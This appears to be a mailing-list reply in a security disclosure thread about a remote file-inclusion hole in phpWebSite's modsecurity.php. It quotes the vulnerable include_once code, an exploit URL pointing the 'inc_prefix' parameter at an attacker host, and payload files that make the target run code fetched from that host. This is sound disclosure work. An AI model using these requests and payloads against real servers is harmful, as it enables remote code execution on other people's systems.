From: avart at gmx.de (avart@....de)
Subject: Re: PHP source injection in phpWebSite

Hi Tim!

> -------- modsecurity.php --------
> <?php
>  global $inc_prefix;
>  if(!$inc_prefix) {
>  ...
>  }
>  ...
>  include_once($inc_prefix."htmlheader.php");
> ?>
> ----------------------------------
>  
> If someone request a URL like 
> http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/, 
> the htmlheader.php file from MYBOX would be included,
> and the attacker would be able to include any code he 
> wants.
>  
> Examples
> ======== 
> http://SERVER/catalog/inludes/include_once.php?inc_prefix=http://MYBOX/
>  
> --- htmlheader.php ---
> <? passthru("/bin/ls") ?>
> ----------------------
> 
> Output: dir listing of the current dierctory

That's not completely right. You have to put an "echo" (with the right
quoting around the evil code), because the evil webserver (MYBOX) usually execute
files ending with .php (if MYBOX doesn't
do it, the example is ok).
So usually you want to put the following line in htmlheader.php on the evil
server (MYBOX):
<?php echo "<?php phpinfo();?>" ?> .
Now, if you request MYBOX/htmlheader.php the following line would be
included (and executed):
<?php phpinfo();?>

In the example of Tim, the /bin/ls output from the evil machine (MYBOX)
would be included, because
htmlheader (usually) get's executed, because of the .php suffix.
It's important to point to it, I got a lot of mails from users, that didn't
get how to include $evil_code 
when $evil_machine (aka MYBOX) interpretes files with the .php suffix.

Just my 0,2 EUR-Cents

Regards,
Avart

-- 
Werden Sie mit uns zum "OnlineStar 2002"! Jetzt GMX w?hlen -
und tolle Preise absahnen! http://www.onlinestar.de

Powered by blists - more mailing lists